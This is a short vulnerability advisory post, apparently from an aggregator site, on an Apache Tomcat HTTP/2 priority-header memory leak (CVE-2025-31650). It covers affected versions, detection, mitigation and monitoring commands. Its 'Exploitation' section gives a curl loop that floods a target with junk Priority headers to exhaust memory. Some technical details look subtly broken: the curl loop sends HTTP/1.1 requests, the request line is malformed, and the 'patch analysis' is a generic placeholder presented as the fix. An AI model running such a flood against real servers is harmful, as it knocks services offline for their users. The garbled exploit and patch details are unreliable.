How CVE-2025-31650 Works
Apache Tomcat fails to properly validate and clean up malformed HTTP/2 priority headers. When an attacker sends repeated invalid headers, Tomcat does not release allocated memory, causing a memory leak. Over time, this exhausts available heap memory, triggering an `OutOfMemoryException` and crashing the server. The vulnerability affects Tomcat 9.0.76–9.0.102, 10.1.10–10.1.39, and 11.0.0-M2–11.0.5.
DailyCVE Form
Platform: Apache Tomcat
Version: 9.0.76–11.0.5
Vulnerability: Memory leak
Severity: High
Date: 05/05/2025
What Undercode Say:
Exploitation
1. Craft invalid HTTP/2 priority headers:
GET / HTTP/2 Priority: invalid=1
2. Flood target server:
for i in {1..1000}; do curl -H "Priority: junk$i" http://target/; done
Detection
Check Tomcat logs for `OutOfMemoryError`:
grep -i "OutOfMemoryError" /var/log/tomcat/catalina.out
Mitigation
1. Upgrade Tomcat:
wget https://dlcdn.apache.org/tomcat/tomcat-11/v11.0.6/bin/apache-tomcat-11.0.6.tar.gz
2. Apply memory limits in `setenv.sh`:
export JAVA_OPTS="-Xmx512m -Xms128m"
Monitoring
Track heap usage via JMX:
jstat -gc <tomcat_pid> 1000
Patch Analysis
The fix enforces strict header validation:
if (!isValidPriority(header)) {
throw new IllegalArgumentException();
}
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
